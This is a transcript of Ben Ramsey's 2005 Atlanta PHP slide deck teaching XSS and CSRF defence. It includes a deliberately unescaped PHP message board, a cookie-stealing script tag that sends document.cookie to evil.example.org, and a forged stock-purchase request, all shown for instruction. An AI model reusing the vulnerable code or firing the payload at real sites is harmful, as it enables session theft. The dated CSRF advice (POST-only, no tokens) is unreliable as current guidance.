Upgrade to Pro — share decks privately, control downloads, hide ads and more …

XSS and CSRF: Programmers Prepare, Users Beware (Atlanta PHP July 2005)

XSS and CSRF: Programmers Prepare, Users Beware (Atlanta PHP July 2005)

Cross-site scripting (XSS) and cross-site request forgeries (CSRF) are often confused as being one and the same, but this misconception can lead to disastrous results. In this talk, you will encounter each of these attacks through examples and learn to distinguish between them. You will also examine secure coding practices and techniques for prevention.

0c217b9a7dd0aa31ed40bd0f453727e1?s=128

Ben Ramsey
PRO

July 07, 2005
Tweet

More Decks by Ben Ramsey

Other Decks in Programming

Transcript

  1. Ben Ramsey Atlanta PHP 7 July 2005 1 XSS &

    CSRF Programmers Prepare, Users Beware
  2. Overview ‣ Cross-site Scripting (XSS) ‣ Cross-site Request Forgeries (CSRF)

    ‣ Questions 2
  3. XSS (Cross-site Scripting) ‣ Exploits user/browser trust in a Web

    site ‣ Generally involve sites that display foreign data (forums, Web mail clients, RSS feed readers) ‣ Inject content of attacker’s choosing ‣ Intent is to gain user information ‣ Attack is not “personal” 3
  4. Typical XSS Process ‣ Naughty user visits vulnerable site ‣

    Naughty user exploits the vulnerable site by posting Javascript code to the site ‣ Code posted usually sends information to another site (hence the term “cross-site”) ‣ Nice user visits the vulnerable site ‣ Nice user loads page with bad code (unknowingly) and runs the code ‣ Nice user unknowingly sends sensitive information to naughty user 4
  5. Message Board 5 <form method="POST"> <input type="text" name="message"/><br/> <input type="submit"/>

    </form> <!-- continued . . . -->
  6. Message Board 6 <?php if (isset($_POST['message'])) { file_put_contents('board.txt', "{$_POST['message']}<hr/>", FILE_APPEND);

    } $messages = file_get_contents('board.txt'); echo $messages; ?>
  7. Message Board ‣ Imagine what happens when a the naughty

    user enters: <script>document.location = 'http:// evil.example.org/steal_cookies.php? cookies=' + document.cookie</script> ‣ Now, all cookies from the nice user will be stolen when this page is accessed 7
  8. Preventing XSS ‣ Filter all incoming data -- ensure that

    input received is input expected ‣ Use a whitelist approach ‣ Use a strict naming convention ‣ Use existing PHP functions to escape data on output 8
  9. Safer Message Board 9 <?php if (isset($_POST['message'])) { file_put_contents('board.txt', "{$_POST['message']}<hr/>",

    FILE_APPEND); } $messages = file_get_contents('board.txt'); echo htmlentities($messages); ?>
  10. CSRF (Cross-site Request Forgeries) ‣ Exploits a Web site’s trust

    in the user/ browser ‣ Generally involve Web sites that rely on the identity of the users ‣ Perform HTTP requests of the attacker’s choosing ‣ Intent is to trick a user into performing an HTTP request/action ‣ Attack is not “personal” 10
  11. Typical CSRF Process ‣ Naughty user visits vulnerable site ‣

    Naughty user exploits the vulnerable site by posting an IMG tag or other code that sends an HTTP request ‣ Code posted usually causes a request to be made to another site (hence the term “cross- site”) ‣ Nice user visits the vulnerable site ‣ Nice user loads page with bad code ‣ Nice user unknowingly causes an HTTP request to be sent 11
  12. Quick look at HTTP ‣ Question: You load up a

    page in a Web browser that has three images on it and a LINK tag for a CSS file. How many HTTP requests were made? ‣ Answer: Five 12
  13. Quick look at HTTP 13 GET / HTTP/1.1 Host: example.org

    User-Agent: Mozilla/5.0 Gecko Accept: text/xml, image/png, image/jpeg, image/gif, */* HTTP/1.1 200 OK Content-Type: text/html Content-Length: 57 <html> <img src="http://example.org/image.png" /> </html>
  14. Quick look at HTTP 14 GET /image.png HTTP/1.1 Host: example.org

    Accept: text/xml, image/png, image/jpeg, image/gif, */*
  15. Quick look at HTTP ‣ Browsers do not restrict the

    IMG tag to specific image types ‣ IMG tag could point to a page instead of an image ‣ Consider the following URL: http://stocks.example.org/stocks.php? symbol=IBM&shares=40 ‣ CSRF makes use of local cookies to exploit the trust of the Web site in the user 15
  16. Quick look at HTTP 16 GET /stocks.php?symbol=IBM&shares=40 HTTP/1.1 Host: stocks.example.org

    Accept: text/xml, image/png, image/jpeg, image/gif, */* Cookie: PHPSESSID=1234567890
  17. Preventing CSRF ‣ Use POST rather than GET in forms

    ‣ Use $_POST rather than rely on register_globals; turn off register_globals ‣ Do not focus on convenience ‣ Force the use of your own forms 17
  18. For more information... ‣ My Web site: http://benramsey.com ‣ PHP

    Security Consortium: http://phpsec.org Questions? 18